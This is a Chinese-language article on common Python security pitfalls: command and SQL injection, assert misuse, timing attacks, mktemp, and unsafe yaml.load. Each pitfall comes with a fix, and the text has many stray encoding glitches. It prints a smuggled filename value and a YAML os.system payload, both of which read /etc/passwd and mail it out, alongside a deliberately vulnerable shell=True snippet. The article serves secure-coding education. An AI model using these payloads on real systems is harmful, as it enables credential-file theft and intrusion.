摘要:在考慮安全性時��,你需要考慮如何避免被濫用����,也不例外,即使在標(biāo)準(zhǔn)庫中���,也存在用于編寫應(yīng)用的不良實(shí)踐�。計(jì)時攻擊需要精確性���,所以通常不能用于高延遲的遠(yuǎn)程網(wǎng)絡(luò)��。由于大多數(shù)應(yīng)用程序涉及可變延遲���,因此幾乎不可能在服務(wù)器上編寫計(jì)時攻擊�。
簡評:編寫安全代碼很困難��,當(dāng)你學(xué)習(xí)一個編程語言�����、模塊或框架時����,你會學(xué)習(xí)其使用方法。 在考慮安全性時���,你需要考慮如何避免被濫用�����,Python 也不例外����,即使在標(biāo)準(zhǔn)庫中����,也存在用于編寫應(yīng)用的不良實(shí)踐。然而�����,許多 Python 開發(fā)人員卻根本不知道它們����。
1. 輸入注入(Input injection)
注入攻擊非常廣泛而且很常見,注入有很多種類���,它們影響所有的語言�����、框架和環(huán)境�����。
SQL 注入是直接編寫 SQL 查詢(而非使用 ORM) 時將字符串字面量與變量混合��。我讀過很多代碼�,其中「escaping quotes」被認(rèn)為是一種修復(fù)���,但事實(shí)并非如此��,可以通過這個鏈接查看 SQL 注入所有可能發(fā)生的復(fù)雜方式�����。
命令注入可能在使用 popen���、subprocess����、os.system 調(diào)用一個進(jìn)程并從變量中獲取參數(shù)時發(fā)生����,當(dāng)調(diào)用本地命令時,有人可能會將某些值設(shè)置為惡意值����。
下面是個簡單的腳本,使用用戶提供的文件名調(diào)用子進(jìn)程:
import subprocess
def transcode_file(request, filename):
command = "ffmpeg -i "{source}" output_file.mpg".format(source=filename)
subprocess.call(command, shell=True) # a bad idea!
攻擊者會將 filename 的值設(shè)置為“; cat / etc / passwd | mail [email protected] 或者其他同樣危險的東西��。
修復(fù):
如果你使用了 Web 框架���,可以用附帶的實(shí)用程序?qū)斎脒M(jìn)行清理��,除非有充分的理由���,否則不要手動構(gòu)建 SQL 查詢�����,大多數(shù) ORM 都具有內(nèi)置的消毒方法。
對于 shell���,可以使用 shlex 模塊正確地轉(zhuǎn)義輸入��。
2. assert 語句(Assert statements)
不要使用 assert 語句來防止用戶訪問不應(yīng)訪問的代碼段�����。
def foo(request, user):
assert user.is_admin, “user does not have access”
# secure code...
現(xiàn)在����,默認(rèn)情況下���,Python 以 debug 為 true 來執(zhí)行腳本�����,但在生產(chǎn)環(huán)境中���,通常使用優(yōu)化運(yùn)行����,這將會跳過 assert 語句并直接轉(zhuǎn)到安全代碼��,而不管用戶是否是 is_admin���。
修復(fù):
僅在與其他開發(fā)人員進(jìn)行通信時使用 assert 語句�,例如在單元測試中或?yàn)榱朔乐共徽_的 API 使用���。
3. 計(jì)時攻擊(Timing attacks)
計(jì)時攻擊本質(zhì)上是一種通過計(jì)時比較提供值所需時間來暴露行為和算法的方式��。計(jì)時攻擊需要精確性���,所以通常不能用于高延遲的遠(yuǎn)程網(wǎng)絡(luò)。由于大多數(shù) Web 應(yīng)用程序涉及可變延遲����,因此幾乎不可能在 HTTP Web 服務(wù)器上編寫計(jì)時攻擊。
但是�����,如果你有提示輸入密碼的命令行應(yīng)用程序,則攻擊者可以編寫一個簡單的腳本來計(jì)算將其值與實(shí)際密碼進(jìn)行比較所需的時間��。
修復(fù):
使用在 Python 3.5 中引入的 secrets.compare_digest 來比較密碼和其他私密值����。
4.臨時文件(Temporary files)
要在 Python 中創(chuàng)建臨時文件��,通常使用 mktemp() 函數(shù)生成一個文件名���,然后使用該名稱創(chuàng)建一個文件����。 「這是不安全的�����,因?yàn)榱硪粋€進(jìn)程可能會在調(diào)用 mktemp() 和隨后嘗試通過第一個進(jìn)程創(chuàng)建文件之間的空隙創(chuàng)建一個同名文件����。」這意味著應(yīng)用程序可能加載錯誤的數(shù)據(jù)或暴露其他的臨時數(shù)據(jù)����。
如果調(diào)用不正確的方法��,則最新版本的 Python 會拋出運(yùn)行警告����。
修復(fù):
如果需要生成臨時文件��,請使用 tempfile 模塊并使用 mkstemp�。
5. 使用 yaml.load
引用 PyYAML 文檔:
警告:使用從不可信源接收到的數(shù)據(jù)來調(diào)用 yaml.load 是不安全的! yaml.load 和pickle.load 一樣強(qiáng)大����,所以可以調(diào)用任何 Python 函數(shù)。
在流行的 Python 項(xiàng)目 Ansible 中找到的這個美麗的例子�,你可以將此值作為(有效)YAML 提供給 Ansible Vault,它使用文件中提供的參數(shù)調(diào)用 os.system()��。
!!python/object/apply:os.system ["cat /etc/passwd | mail [email protected]"]
所以�����,從用戶提供的值中有效地加載 YAML 文件會讓應(yīng)用對攻擊打開大門����。
修復(fù):
總是使用 yaml.safe_load�,除非你有一個非常好的理由��。
文章版權(quán)歸作者所有����,未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除����。
轉(zhuǎn)載請注明本文地址:http://systransis.cn/yun/41908.html
